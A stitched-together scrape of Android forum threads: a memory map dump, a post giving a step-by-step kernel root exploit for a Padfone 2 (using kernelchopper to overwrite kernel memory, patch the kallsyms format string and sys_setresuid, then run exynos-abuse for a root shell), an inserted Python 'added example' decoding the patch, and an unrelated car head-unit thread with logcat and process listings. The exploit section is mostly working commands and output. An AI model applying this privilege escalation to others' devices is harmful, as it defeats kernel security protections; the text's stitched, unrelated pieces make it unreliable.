54040000-5407ffff : tegra_grhost
54040000-5407ffff : mpe
54080000-540bffff : tegra_grhost
54080000-540bffff : vi
54100000-5413ffff : tegra_grhost
54100000-5413ffff : isp
54200000-5423ffff : regs
54200000-5423ffff : tegra_grhost
54200000-5423ffff : tegradc
54240000-5427ffff : tegra_grhost
58000000-59ffffff : gart
60005000-60005007 : tegra_wdt
60005000-60005007 : tegra_wdt
60006000-60006003 : tegra_wdt
60006000-60006003 : tegra_wdt
60010000-60010fff : tegra-aes
6001a000-6001dbff : tegra-aes
70000c00-70000c7f : tegra20-das
70000c00-70000c7f : tegra20-das
70002400-700025ff : tegra20-spdif
70002400-700025ff : tegra20-spdif
70002800-700028ff : tegra20-i2s.0
70002800-700028ff : tegra20-i2s
70002a00-70002aff : tegra20-i2s.1
70002a00-70002aff : tegra20-i2s
70006000-7000601f : serial
70006040-7000607f : tegra_uart.1
70006200-700062ff : tegra_uart.2
70006300-7000631f : serial
7000a000-7000a003 : tegra_pwm.0
7000a000-7000a003 : tegra_pwm
7000c000-7000c0ff : tegra-i2c.0
7000c000-7000c0ff : tegra-i2c
7000c400-7000c4ff : tegra-i2c.1
7000c400-7000c4ff : tegra-i2c
7000c500-7000c5ff : tegra-i2c.2
7000c500-7000c5ff : tegra-i2c
7000d000-7000d1ff : tegra-i2c.3
7000d000-7000d1ff : tegra-i2c
7000d800-7000d9ff : spi_tegra.2
7000d800-7000d9ff : spi_tegra.2
7000e200-7000e2ff : tegra-kbc
7000e200-7000e2ff : tegra-kbc
7000f000-7000f3ff : mc
c5000000-c5003fff : fsl-tegra-udc
c5000000-c5003fff : tegra-otg
c5000000-c5003fff : fsl-tegra-udc
c8000000-c80001ff : sdhci-tegra.0
c8000000-c80001ff : mmc1
c8000600-c80007ff : sdhci-tegra.3
c8000600-c80007ff : mmc0
didn't work on my "STILL UNROOTABLE" Nec 101T....
Rooting without bootloader unlock
Just rooted my Android without unlocking !!
fluxx_srb said:
my /proc/iomem says quite a different thing from yours, presumably because the phone has just 512MB ram. If I try to dump any addresses above 80008000, it writes bus error. Here's the output:
Code:
00200000-0fbfffff : System RAM
00208000-00a48c6b : Kernel code
00a80000-00d33a23 : Kernel data
becomingx said:
The prerequisites are: a Linux system with an ARM cross-compilation setup, the Linux kernel for your device (I usually get this from the firmware package provided by the OEM), and a copy of the kernel source used for the device (again, from the OEM)
Hello to all, I just got root on padfone 2 without unlocking and without these prerequisites. I used adt-bundle-linux-x86-20130729, grep and a compiler (try terminal IDE, or use gentooandroid.sourceforge.net ; if you trust the binaries attached to this message you do not need any compiler), then kernelchopper, then applied manually the end of exynos-abuse.
STEP 0: You may apply this on any Android system at your own risk. If your output of any instruction is not exactly as shown here, you should adapt the following instructions accordingly (following color codes, and counting underlined words in hexadecimal notation), or better, quit. If you do not get exactly all the outputs I colored here in red, you should QUIT or change previous instructions. If you have no internal microSD, I suggest you first chdir to a directory on your computer which can host one file of size >4Gb (3898777809 bytes for my padfone 2, the day I bought it).
STEP 1: finding s_show->seq_printf format string found at: 0x80c281c6.
We first use adb to put all attached files (unzipped) in /data/data/com.spartacusrex.spartacuside/adb.
Code:
script backup_before_installing_su_to_disk
adt-bundle-linux-x86-20130729/sdk/platform-tools/adb push /tmp/busybox /data/.tmp/grep
adt-bundle-linux-x86-20130729/sdk/platform-tools/adb push /tmp/kernelchopper /data/.tmp
adt-bundle-linux-x86-20130729/sdk/platform-tools/adb push /tmp/exynos-abuse-static /data/.tmp
adt-bundle-linux-x86-20130729/sdk/platform-tools/adb shell
cd /data/.tmp
./grep Kernel /proc/iomem
[COLOR="RoyalBlue"]80208000[/COLOR]-80d9e39f : Kernel code
80f04000-8128184b : Kernel data
./kernelchopper d [COLOR="RoyalBlue"]80208000[/COLOR] c00000 | ./grep -C 1 '25 70 4b 20 25 63 20 25 73 0a 00\|: 70 4b 20 25 63 20 25 73 0a 00\|: 4b 20 25 63 20 25 73 0a 00\|: 20 25 63 20 25 73 0a 00\|: 25 63 20 25 73 0a 00\|: 63 20 25 73 0a 00\|25 70 4b 20 25 63 20 25 73 0a $\|25 70 4b 20 25 63 20 25 73 $\|25 70 4b 20 25 63 20 25 $\|25 70 4b 20 25 63 20 25 $\|25 70 4b 20 25 63 20 $\|25 70 4b 20 25 63 $' | ./grep -C 1 '25 70 4b 20 25 63 20 25 73 0a 00\|: 20 25 73 0a 00\|: 25 73 0a 00\|: 73 0a 00\|: 0a 00\|: 00\|25 70 4b 20 25 $\|25 70 4b 20 $\|25 70 4b $\|25 70 4b $\|25 70 $\|25 $'
[COLOR="Green"]80c281c[/COLOR]0: 5b 25 73 5d 0a 00 25 70 4b 20 25 63 20 25 73 0a
80c281d0: 00 6b 61 6c 6c 73 79 6d 73 00 2b 25 23 6c 78 2f
./kernelchopper d [COLOR="Green"]80c281c[/COLOR]0 20
80c281c0: [U]5b 25 73 5d 0a 00[/U] 25 70 4b 20 25 63 20 25 73 0a
80c281d0: 00 6b 61 6c 6c 73 79 6d 73 00 2b 25 23 6c 78 2f
./kernelchopper d [COLOR="Green"]80c281c[/COLOR][U]6[/U] b
[COLOR="Olive"]80c281c6[/COLOR]: [COLOR="Red"]25 70 4b 20 25 63 20 25 73 0a 00[/COLOR]
./kernelchopper m [COLOR="Olive"]80c281c6[/COLOR]
[COLOR="Red"]204b7025[/COLOR]
./grep sys_setresuid /proc/kallsyms
00000000 T sys_setresuid
00000000 T sys_setresuid16
./kernelchopper m [COLOR="Olive"]80c281c6[/COLOR] 20207025
./kernelchopper m [COLOR="Olive"]80c281c6[/COLOR]
[COLOR="Red"]20207025[/COLOR]
./grep sys_setresuid /proc/kallsyms
c[COLOR="SandyBrown"]00856f0[/COLOR] T sys_setresuid
c00b7318 T sys_setresuid16
Notice that /proc/kallsyms now gives offsets instead of 00000000.
STEP 2: patching sys_setresuid, applying manually exynos-abuse.c (found at 0x802856f0, which is 0x00856f0 plus 80208000). You should replace the underlined lone 8 by the number of bytes underlined, before the 00 00 50 e3 ...
Code:
./kernelchopper d [COLOR="YellowGreen"]802856f0[/COLOR] 80 | ./grep '00 00 50 e3\|20 00 00 ea'
[COLOR="Purple"]8028572[/COLOR]0: [U]04 72 93 e5 a7 da ff eb[/U] 00 00 50 e3 20 00 00 ea
./kernelchopper d [COLOR="Purple"]8028572[/COLOR][U]8[/U] 8
[COLOR="MediumTurquoise"]80285728[/COLOR]: [COLOR="Red"]00 00 50 e3 20 00 00 ea[/COLOR]
./kernelchopper m [COLOR="MediumTurquoise"]80285728[/COLOR]
[COLOR="Red"]e3500000[/COLOR]
./kernelchopper m [COLOR="MediumTurquoise"]80285728[/COLOR] e3500001
STEP 3: getting a root shell.
Code:
./exynos-abuse-static
[email protected]:/data/.tmp # /system/bin/id
uid=[COLOR="Red"]0[/COLOR](root) gid=2000(shell) groups=1003(graphics),1004(input),1007(log),1009(mount),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats)
And you are root until the end of the adb connection. I strongly suggest that you make a first true backup, to have a chance to restore the phone to its current state. With an internal microSD, you can type:
Code:
cp grep bzip2
./bzip2 -c < /dev/block/mmcblk0 > /Removable/Storage1/backup.bz2
To exploit this file, you will need kpartx.
If you have NO internal microSD, try a network drive; or if you can wait a full day (like me), you can do:
Code:
cp grep bzip2
cp grep uuencode
./bzip2 -c < /dev/block/mmcblk0 | ./uuencode -
The result will be shown in the current window, so you had better hide it once it works. I had a performance of 400kb/s with a hidden xterm.
You will then be able to recover its content with
Code:
LANG= grep -aA99999999 '^begin 666 -' < backup_before_installing_su_to_diskreal | uudecode -o backup.bz2
You may now install /system/xbin/su, eventually renamed to avoid exposing su to malware.
Here is my firmware (see attached pic).
Code:
Android version: 4.1.1, 3.4.0-perf-g64..., M3.13.30-A68_101034 [Jan 22 2013]
If you need help, please type up-arrow repeatedly, down-arrow repeatedly, then provide the file backup_before_installing_su_to_diskreal.
Credits to alephzain for original version of exynos-abuse.c, SW686 for kernelchopper.c, spartacusrex for Google-Play's Terminal IDE.
I now use attached shell script with . ./root_padfone.sh (notice the dot) ; please update the script if you needed to change anything in step 1, or 2.
Code:
[email protected] ~/root_padfone $ . ./root_padfone.sh
[email protected]:/data/data/com.spartacusrex.spartacuside/adb/root_padfone # exit
e3500000
[email protected] ~/root_padfone $
In the images, you can see I use an ssh server to share the adb privileges.
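Added example (not part of the original post, and not the poster's code): decoding the bytes shown in STEP 1 shows that the write turns the `%pK` specifier into `%p`, which is why `/proc/kallsyms` stops printing zeros. The `audit` helper is a hypothetical defender-side check that flags a reader seeing real addresses while `kptr_restrict` says they should be masked; the `kptr_restrict` values passed to it are assumptions, since the post does not show that setting.

```python
"""Added example: decode the STEP 1 bytes and check kallsyms masking."""
import struct

# Values copied from the post's own kernelchopper output.
ORIGINAL_WORD = 0x204B7025   # word at 0x80c281c6 before the write
PATCHED_WORD = 0x20207025    # word at 0x80c281c6 after the write
FORMAT_BYTES = bytes.fromhex("25 70 4b 20 25 63 20 25 73 0a 00")

# /proc/kallsyms lines quoted in the post, before and after the write.
KALLSYMS_BEFORE = "00000000 T sys_setresuid\n00000000 T sys_setresuid16\n"
KALLSYMS_AFTER = "c00856f0 T sys_setresuid\nc00b7318 T sys_setresuid16\n"


def word_to_text(word):
    """Decode a 32-bit little-endian memory word into the ASCII it stores."""
    return struct.pack("<I", word).decode("ascii")


def c_string(raw):
    """Return the NUL-terminated ASCII string at the start of raw."""
    return raw.split(b"\x00", 1)[0].decode("ascii")


def apply_word(raw, word):
    """Overwrite the first four bytes of raw with word (little-endian)."""
    return struct.pack("<I", word) + raw[4:]


def parse_kallsyms(text):
    """Parse 'address type name' lines into (int, str, str) tuples."""
    entries = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 3:
            continue
        try:
            entries.append((int(fields[0], 16), fields[1], fields[2]))
        except ValueError:
            continue  # not a symbol line
    return entries


def addresses_masked(text):
    """True when every parsed symbol address is zero (the masked form)."""
    entries = parse_kallsyms(text)
    return bool(entries) and all(addr == 0 for addr, _, _ in entries)


def audit(kptr_restrict, kallsyms_text, has_cap_syslog=False):
    """Compare the kptr_restrict policy with what a reader actually sees.

    kptr_restrict is the integer from /proc/sys/kernel/kptr_restrict:
    0 = no masking, 1 = masked unless the reader has CAP_SYSLOG,
    2 = always masked. Returns 'leak' when policy requires zeros but
    real addresses are visible, as after the write described in STEP 1.
    """
    if not parse_kallsyms(kallsyms_text):
        return "no-data"
    if kptr_restrict == 0:
        return "unrestricted"
    masked = addresses_masked(kallsyms_text)
    must_mask = kptr_restrict >= 2 or not has_cap_syslog
    if must_mask and not masked:
        return "leak"
    return "masked" if masked else "privileged-read"


if __name__ == "__main__":
    print(repr(c_string(FORMAT_BYTES)))
    print(repr(c_string(apply_word(FORMAT_BYTES, PATCHED_WORD))))
    # Assumption: kptr_restrict=1 and an unprivileged reader.
    print(audit(1, KALLSYMS_BEFORE), audit(1, KALLSYMS_AFTER))
```

On a device, feed `audit` the contents of `/proc/sys/kernel/kptr_restrict` and a `/proc/kallsyms` read taken as an unprivileged user; a `leak` result means kernel addresses are exposed despite the configured policy.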
closed source
it seems both MotoChopper as well as framaroot are closed source rooters, so using them involves a certain risk...
mai77 said:
it seems both MotoChopper as well as framaroot are closed source rooters, so using them involves a certain risk...
This is why I invented the more open-source method that is displayed three posts above.
xdej said:
Just rooted my Android without unlocking !!
I just updated this post: any busybox you trust will work, and Terminal IDE is no longer needed.
I also suggested to make backups with instructions on how to make them.
Has anyone done this on a Galaxy Nexus running 4.2.2? I've spent a bunch of time searching and this seems like the only hope for rooting via an exploit on the GNex. I actually do kernel and android development but from my understanding of the posts here I need to get the address of certain kernel functions to apply this to my device. I'm running the stock build, can anyone help me with this or walk me through how to get the required information to use kernelchopper?
Thanks.
The best guide I've followed from xda this year, period.
I've rooted an a13 tablet with android 4.1.2 (it was easy as motochopper already works on it).
Tried on a 4.2.2 no-name tablet and did not manage to make it work for now, but I will try harder
Hi all,
I've purchased the above head unit (Will post specs below) and thought I'd give the 1Gb RAM unit a try, I've played about with android for a long time so already knew 1Gb was light, but I got it cheap (Always the problem!).
So I've got a Hizpo (I know that's a bundler) unit, so actual specs are:
Android 6.0.1
A-MEDIA AUTO (1024x600)
Baseband: SF3GR_M-26.3
Kernel: 3.14.0+ [email protected] #55
Build number: sofia3gr_car_64-userdebug
MCU: MTCD_XRC_V2.58_1
Memory: 918MB
Now this seems to be quite up to date, new Android, new MCU version and kernel. It boots pretty quickly and also apps do load quite quickly too, even google maps.
The problem I have is that apps suddenly close without warning and without error. So for example I open google maps, choose directions, and go to start navigation and suddenly it closes. No normal app has crashed message or anything like that.
So my suspicion is this is some kind of task killer running, killing apps that are trying to consume too much memory or CPU. I know the stock rom has something like this as I have a 'rocket' icon I can click and it shows how much ram it has managed to free up. I'm suspecting there is a background service doing this periodically and killing things, but being a bit over-ambitious! So far I'm not consuming anywhere near the full RAM, whenever I've checked I've had around 600MB free at any one time and the unit isn't going really laggy or anything I'd expect, so I think it's just the task killer getting in the way.
Does anyone have anything similar, or have found what is killing tasks off like this?
I'm trying to get adb over wireless working, initially this hasn't worked but I've got another couple of ways to try first to get adb debugging.
Any suggestions please?
(And yes I know, moving to a 2Gb board would be simplest option, but cost is an issue!)
Hi Andy,
I recently bought exactly the same unit off an eBay seller 'stereo_eu'.
My unit behaves exactly the same as yours - BADLY!
First problem occurred when the apparent UK stock unit took 3 weeks to arrive from China, and eBay removed the seller's items for an unspecified infringement.
After fitting, it does exactly as you described, and other nonsense.
I found a MCU version V2.60 which installed correctly but made no difference.
I then contacted the seller who sent me a link to an update.zip package, which turned out to be a corrupt .zip file, (new4_sofia_6.0_wifi(20170915).zip) and put my unit into a V6.1.2 recovery mode loop.
I managed to recover it with a V5.1.1 Lollipop version found on here, and it's better than the stock 6.0.1 software, but still has its problems.
They seem totally unwilling to link to a 'non corrupt' update file, and have asked me to send the unit back (to China) for replacement, which I have declined, and requested a return to their UK address, and a refund.
Not impressed at all so far . . . . . . . .
Well, I'm not saying the units are junk, I'm relatively happy as I can still use my phone for navigation, so not a total loss, but I like tinkering with android (I'm a former android dev) so figuring out what's going on is what I'm aiming to do.
I've now installed root (SuperSu) and doing adb shell I can gain root and get through the filesystem to see what's going on. adb logcat didn't show anything interesting as I thought it might, I've also confirmed that "Sofia-1-C9-Server-V1.0.apk" does not exist on this head unit, however when you turn the ignition off it shows "Shutting Down" and goes into a sleep mode which does a similar thing and kills all background services, etc which again don't get restarted after powering back on.
I've got a bit of logcat output when I launched maps, and in the process of launching maps the music playing in the background stopped, but nothing in the log seems to indicate why:
11-23 19:27:37.209 1417 4469 E Settings: getIntForUser name:location_mode value:3
11-23 19:27:37.217 1417 4469 E Settings: getIntForUser name:location_mode value:3
11-23 19:27:37.227 1417 4469 E Settings: getIntForUser name:location_mode value:3
11-23 19:27:37.231 1417 4469 E Settings: getIntForUser name:location_mode value:3
11-23 19:27:37.239 1417 4469 E Settings: getIntForUser name:location_mode value:3
11-23 19:27:37.243 1417 4469 E Settings: getIntForUser name:location_mode value:3
11-23 19:27:37.244 1417 4469 I GCoreUlr: Successfully inserted 1 locations
11-23 19:27:37.254 1417 4469 E Settings: getIntForUser name:location_mode value:3
11-23 19:27:37.257 1417 4469 E Settings: getIntForUser name:location_mode value:3
11-23 19:27:38.190 1417 1417 I GeofencerStateMachine: sendTransitions: location=Location[fused 0.0,-1.1 acc=6 et=+20m47s600ms alt=82.6459732055664 vel=0.0 bear=171.0 {Bundle[mParcelledData.dataSize=356]}]
11-23 19:27:39.284 575 731 I ActivityManager: START u0 {act=android.intent.action.MAIN cat=[android.intent.category.HOME] flg=0x10200000 cmp=com.android.launcher/com.android.launcher2.Launcher (has extras)} from uid 1000 on display 0
11-23 19:27:39.484 575 743 E WifiConfigStore: makeChannelList age=3600000 for "MYWIFIHERE"WPA_PSK max=6 bssids=1
11-23 19:27:39.485 575 743 E WifiConfigStore: has my:mac:adress:here freq=2412 age=2902 ?=true
11-23 19:27:39.487 575 743 D WifiStateMachine: starting scan for "MYWIFIHERE"WPA_PSK with 2412
11-23 19:27:39.534 831 1054 I OpenGLRenderer: Initialized EGL, version 1.4
11-23 19:27:39.588 575 743 E WifiConfigStore: updateConfiguration freq=2412 BSSID=my:mac:adress:here RSSI=-73 "MYWIFIHERE"WPA_PSK
11-23 19:27:39.663 831 1054 V RenderScript: 0xde54d000 Launching thread(s), CPUs 4
11-23 19:27:39.701 575 743 E WifiConfigStore: updateSavedNetworkHistory(): try "MYWIFIHERE"WPA_PSK SSID="MYWIFIHERE" MYWIFIHERE [WPA2-PSK-CCMP][ESS] ajst=0
11-23 19:27:39.702 575 743 E WifiConfigStore: got known scan result my:mac:adress:here key : "MYWIFIHERE"WPA_PSK num: 1 rssi=-72 freq=2412
11-23 19:27:39.706 575 743 E WifiConfigStore: writeKnownNetworkHistory() num networks:3 needWrite=false
11-23 19:27:40.140 831 1054 W OpenGLRenderer: Incorrectly called buildLayer on View: ShortcutAndWidgetContainer, destroying layer...
11-23 19:27:40.140 831 1054 W OpenGLRenderer: Incorrectly called buildLayer on View: ShortcutAndWidgetContainer, destroying layer...
11-23 19:27:42.594 575 743 E WifiConfigStore: updateConfiguration freq=2412 BSSID=my:mac:adress:here RSSI=-72 "MYWIFIHERE"WPA_PSK
11-23 19:27:43.938 1417 1417 I GeofencerStateMachine: sendTransitions: location=Location[fused 0.0,-1.1 acc=6 et=+20m52s603ms alt=82.55806732177734 vel=0.0 bear=171.0 {Bundle[mParcelledData.dataSize=356]}]
11-23 19:27:44.607 4505 4514 W CursorWrapperInner: Cursor finalized without prior close()
11-23 19:27:45.602 575 743 E WifiConfigStore: updateConfiguration freq=2412 BSSID=my:mac:adress:here RSSI=-73 "MYWIFIHERE"WPA_PSK
11-23 19:27:48.240 1417 1417 I GeofencerStateMachine: sendTransitions: location=Location[fused acc=6 et=+20m57s609ms alt=82.54087829589844 vel=0.0 bear=171.0 {Bundle[mParcelledData.dataSize=356]}]
11-23 19:27:48.609 575 743 E WifiConfigStore: updateConfiguration freq=2412 BSSID=my:mac:adress:here RSSI=-73 "MYWIFIHERE"WPA_PSK
11-23 19:27:51.616 575 743 E WifiConfigStore: updateConfiguration freq=2412 BSSID=my:mac:adress:here RSSI=-73 "MYWIFIHERE"WPA_PSK
11-23 19:27:52.231 1417 4564 E Settings: getIntForUser name:location_mode value:3
11-23 19:27:52.234 1417 4564 E Settings: getIntForUser name:location_mode value:3
11-23 19:27:52.242 1417 4564 E Settings: getIntForUser name:location_mode value:3
11-23 19:27:52.246 1417 4564 E Settings: getIntForUser name:location_mode value:3
11-23 19:27:52.251 1417 4564 E Settings: getIntForUser name:location_mode value:3
11-23 19:27:52.257 1417 4564 E Settings: getIntForUser name:location_mode value:3
11-23 19:27:52.258 1417 4564 I GCoreUlr: Successfully inserted 1 locations
11-23 19:27:52.266 1417 4564 E Settings: getIntForUser name:location_mode value:3
11-23 19:27:52.268 1417 4564 E Settings: getIntForUser name:location_mode value:3
11-23 19:27:53.206 1417 1417 I GeofencerStateMachine: sendTransitions: location=Location[fused acc=6 et=+21m2s613ms alt=82.54087829589844 vel=0.0 bear=171.0 {Bundle[mParcelledData.dataSize=356]}]
11-23 19:27:53.506 575 840 I ActivityManager: START u0 {act=android.intent.action.MAIN cat=[android.intent.category.LAUNCHER] flg=0x10200000 cmp=com.microntek.navisettings/.MainActivity bnds=[315,104][450,277] (has extras)} from uid 10013 on display 0
11-23 19:27:53.586 4576 4576 E art : setrlimit(RLIMIT_CORE) failed for pid 4576: Operation not permitted
11-23 19:27:53.596 575 2496 I ActivityManager: Start proc 4576:com.microntek.navisettings/u0a59 for activity com.microntek.navisettings/.MainActivity
11-23 19:27:53.764 4576 4576 W System : ClassLoader referenced unknown path: /system/app/MTCNaviSettings/lib/x86
11-23 19:27:53.883 575 2263 I ActivityManager: START u0 {act=android.intent.action.MAIN cat=[android.intent.category.LAUNCHER] flg=0x30220000 pkg=com.google.android.apps.maps cmp=com.google.android.apps.maps/com.google.android.maps.MapsActivity} from uid 10059 on display 0
11-23 19:27:54.050 575 587 I art : Background partial concurrent mark sweep GC freed 13790(926KB) AllocSpace objects, 2(40KB) LOS objects, 27% free, 10MB/14MB, paused 3.709ms total 112.505ms
11-23 19:27:54.071 185 185 W hwcomposer: zone is small ,LCDC can not support
11-23 19:27:54.159 4214 4225 I art : Background sticky concurrent mark sweep GC freed 5640(458KB) AllocSpace objects, 9(744KB) LOS objects, 4% free, 38MB/40MB, paused 6.416ms total 63.265ms
11-23 19:27:54.309 4214 4214 I System.out: DEBUG getting preferred mode DRIVE
11-23 19:27:54.338 4590 4590 E art : setrlimit(RLIMIT_CORE) failed for pid 4590: Operation not permitted
11-23 19:27:54.345 575 813 I ActivityManager: Start proc 4590:com.google.process.gapps/u0a10 for content provider com.google.android.gsf/.settings.GoogleSettingsProvider
11-23 19:27:54.348 4214 4214 I System.out: DEBUG getting preferred mode DRIVE
11-23 19:27:54.432 575 2495 D Sensors : activate handle=5,enabled=1
11-23 19:27:54.432 575 2495 E Sensors : HALpen of failed with 'No such file or directory' (2)
11-23 19:27:54.432 575 2495 E Sensors : HALpen of failed with 'No such file or directory' (2)
11-23 19:27:54.433 575 2495 E Sensors : HALpen of failed with 'No such file or directory' (2)
11-23 19:27:54.433 575 2495 E Sensors : HALpen of failed with 'No such file or directory' (2)
11-23 19:27:54.433 575 2495 E Sensors : HALpen of failed with 'No such file or directory' (2)
11-23 19:27:54.433 575 2495 E Sensors : HALpen of failed with 'No such file or directory' (2)
11-23 19:27:54.433 575 2495 E Sensors : HALpen of failed with 'No such file or directory' (2)
11-23 19:27:54.433 575 2495 E Sensors : HALpen of failed with 'No such file or directory' (2)
11-23 19:27:54.433 575 2495 E Sensors : HALpen of failed with 'No such file or directory' (2)
11-23 19:27:54.433 575 2495 E Sensors : HALpen of failed with 'No such file or directory' (2)
11-23 19:27:54.433 575 2495 E Sensors : HALpen of failed with 'No such file or directory' (2)
11-23 19:27:54.447 575 853 E Sensors : HALpen of failed with 'No such file or directory' (2)
11-23 19:27:54.447 575 853 E Sensors : HALpen of failed with 'No such file or directory' (2)
11-23 19:27:54.447 575 853 E Sensors : HALpen of failed with 'No such file or directory' (2)
11-23 19:27:54.468 575 2453 D Sensors : activate handle=3,enabled=1
11-23 19:27:54.468 575 2453 E Sensors : HALpen of failed with 'No such file or directory' (2)
11-23 19:27:54.468 575 2453 E Sensors : HALpen of failed with 'No such file or directory' (2)
11-23 19:27:54.468 575 2453 E Sensors : HALpen of failed with 'No such file or directory' (2)
11-23 19:27:54.554 4590 4590 W System : ClassLoader referenced unknown path: /system/priv-app/GoogleServicesFramework/lib/x86
11-23 19:27:54.582 4214 4232 I System.out: DEBUG getting preferred mode DRIVE
11-23 19:27:54.590 4590 4590 I GservicesProvider: Gservices pushing to system: true; secure/global: true
11-23 19:27:54.609 4214 4214 I Choreographer: Skipped 36 frames! The application may be doing too much work on its main thread.
11-23 19:27:54.626 575 743 E WifiConfigStore: updateConfiguration freq=2412 BSSID=my:mac:adress:here RSSI=-74 "MYWIFIHERE"WPA_PSK
11-23 19:27:54.872 4590 4590 I GoogleHttpClient: GMS http client unavailable, use old client
11-23 19:27:54.933 575 2495 E Sensors : HALpen of failed with 'No such file or directory' (2)
11-23 19:27:54.933 575 2495 E Sensors : HALpen of failed with 'No such file or directory' (2)
11-23 19:27:54.933 575 2495 E Sensors : HALpen of failed with 'No such file or directory' (2)
11-23 19:27:54.977 1417 1417 I GeofencerStateMachine: sendNewLocationAvailability: availability=LocationAvailability[isLocationAvailable: true]
11-23 19:27:54.994 1417 1417 I GeofencerStateMachine: sendNewLocationAvailability: availability=LocationAvailability[isLocationAvailable: true]
List of apps in /system/app
[email protected]_car:/system/app # ls
Bluetooth
BluetoothMidiService
Browser
Calendar
CaptivePortalLogin
CertInstaller
DeskClock
DocumentsUI
ExactCalculator
Galaxy4
Gallery2
Gmail2
GooglePinyinIME
HCTBlueTooth4
HCTBtMusic4
HCTCarTouch
HCTUpdateService
HTMLViewer
HoloSpiralWallpaper
KeyChain
LatinIME
LiveWallpapers
LiveWallpapersPicker
MTCAPKInstall
MTCAVIN
MTCAmpSetup
MTCBackView
MTCCarCD
MTCCivicUSBIPOD
MTCControlInfo
MTCControlSettings
MTCDVD4
MTCFactorySettings
MTCFileBrowser4
MTCIpod4
MTCMovie4
MTCMusic4
MTCNaviSettings
MTCRadio4HCT
MTCSYNC
MTCScreenClock
MTCTV
MTCTpms
MTCTravel4
MTCWheelStudy
Maps
Music
NoiseField
OpenWnn
PacProcessor
PhaseBeam
PicoTts
PrintSpooler
Provision
RFTest
Stk
SuperSU
UserDictionaryProvider
WAPPushManager
webview
So I'm now onto debugging a bit closer, any extra info anyone can provide would be welcome!
Oh and process listing
[email protected]_car:/system/app # ps
USER PID PPID VSIZE RSS WCHAN PC NAME
root 1 0 3060 528 SyS_epoll_ f7795b80 S /init
root 2 0 0 0 kthreadd 00000000 S kthreadd
root 3 2 0 0 smpboot_th 00000000 S ksoftirqd/0
root 5 2 0 0 worker_thr 00000000 S kworker/0:0H
root 6 2 0 0 worker_thr 00000000 S kworker/u8:0
root 7 2 0 0 rcu_gp_kth 00000000 S rcu_preempt
root 8 2 0 0 rcu_gp_kth 00000000 S rcu_sched
root 9 2 0 0 rcu_gp_kth 00000000 S rcu_bh
root 10 2 0 0 smpboot_th 00000000 S migration/0
root 11 2 0 0 worker_thr 00000000 S kworker/0:1
root 12 2 0 0 smpboot_th 00000000 S watchdog/0
root 13 2 0 0 smpboot_th 00000000 S watchdog/1
root 14 2 0 0 smpboot_th 00000000 S migration/1
root 15 2 0 0 smpboot_th 00000000 S ksoftirqd/1
root 17 2 0 0 worker_thr 00000000 S kworker/1:0H
root 18 2 0 0 worker_thr 00000000 S kworker/1:1
root 19 2 0 0 smpboot_th 00000000 S watchdog/2
root 20 2 0 0 smpboot_th 00000000 S migration/2
root 21 2 0 0 smpboot_th 00000000 S ksoftirqd/2
root 23 2 0 0 worker_thr 00000000 S kworker/2:0H
root 24 2 0 0 worker_thr 00000000 S kworker/2:1
root 25 2 0 0 smpboot_th 00000000 S watchdog/3
root 26 2 0 0 smpboot_th 00000000 S migration/3
root 27 2 0 0 smpboot_th 00000000 S ksoftirqd/3
root 28 2 0 0 worker_thr 00000000 S kworker/3:0
root 29 2 0 0 worker_thr 00000000 S kworker/3:0H
root 31 2 0 0 rescuer_th 00000000 S khelper
root 32 2 0 0 vdump_thre 00000000 S vdump Thread
root 33 2 0 0 console_th 00000000 S kconsole
root 34 2 0 0 rescuer_th 00000000 S writeback
root 35 2 0 0 ksm_scan_t 00000000 S ksmd
root 36 2 0 0 rescuer_th 00000000 S bioset
root 37 2 0 0 rescuer_th 00000000 S kblockd
root 38 2 0 0 hub_thread 00000000 S khubd
root 54 2 0 0 fmdev_fifo 00000000 S iui_fm
root 55 2 0 0 ion_heap_d 00000000 S system-heap
root 56 2 0 0 mvpipe_dev 00000000 S ion_secvm_handl
root 57 2 0 0 irq_thread 00000000 S irq/303-rk818
root 58 2 0 0 rescuer_th 00000000 S rk81x_otg_work
root 59 2 0 0 rev_thread 00000000 D rev_thread
root 60 2 0 0 rockchip_f 00000000 S fb-vsync
root 61 2 0 0 kthread_wo 00000000 S rockchip-fb
root 62 2 0 0 cpufreq_in 00000000 S cfinteractive
root 63 2 0 0 irq_thread 00000000 S irq/320-car-rev
root 64 2 0 0 irq_thread 00000000 S irq/321-car-acc
root 65 2 0 0 rescuer_th 00000000 S rk81x-battery-w
root 66 2 0 0 rescuer_th 00000000 S car_wq
root 67 2 0 0 rescuer_th 00000000 S goodix_wq
root 89 2 0 0 kswapd 00000000 S kswapd0
root 90 2 0 0 fsnotify_m 00000000 S fsnotify_mark
root 91 2 0 0 rescuer_th 00000000 S crypto
root 105 2 0 0 rescuer_th 00000000 S bl_wq
root 106 2 0 0 irq_thread 00000000 S irq/40-rga
root 107 2 0 0 vnvm_serve 00000000 S vnvm
root 108 2 0 0 mvpipe_dev 00000000 S VUSB_SE_FE_MEX_
root 109 2 0 0 worker_thr 00000000 S kworker/u9:0
root 110 2 0 0 down_inter 00000000 S vsec
root 111 2 0 0 rescuer_th 00000000 S idi_error_work_
root 112 2 0 0 irq_thread 00000000 S irq/110-vpu.177
root 113 2 0 0 irq_thread 00000000 S irq/111-vpu.177
root 114 2 0 0 irq_thread 00000000 S irq/38-hevc.178
root 115 2 0 0 rescuer_th 00000000 S dwc2
root 116 2 0 0 rescuer_th 00000000 S uether
root 117 2 0 0 rescuer_th 00000000 S adv_wq
root 118 2 0 0 rescuer_th 00000000 S dm_bufio_cache
root 120 2 0 0 mmc_queue_ 00000000 S mmcqd/0
root 121 2 0 0 mmc_queue_ 00000000 S mmcqd/0boot0
root 122 2 0 0 mmc_queue_ 00000000 S mmcqd/0boot1
root 123 2 0 0 mmc_queue_ 00000000 S mmcqd/0rpmb
root 124 2 0 0 worker_thr 00000000 S kworker/2:2
root 125 2 0 0 rescuer_th 00000000 S binder
root 126 2 0 0 intel_adc_ 00000000 S adc-thread
root 127 2 0 0 oct_thread 00000000 S OCT Thread
root 128 2 0 0 rescuer_th 00000000 S dvd_wq
root 129 2 0 0 irq_thread 00000000 S irq/108-dsp_int
root 130 2 0 0 irq_thread 00000000 S irq/107-dsp_int
root 131 2 0 0 irq_thread 00000000 S irq/99-dsp_int3
root 132 2 0 0 rescuer_th 00000000 S ipv6_addrconf
root 133 2 0 0 rescuer_th 00000000 S fuel_gauge.187
root 134 2 0 0 mmc_queue_ 00000000 S mmcqd/1
root 136 2 0 0 rescuer_th 00000000 S deferwq
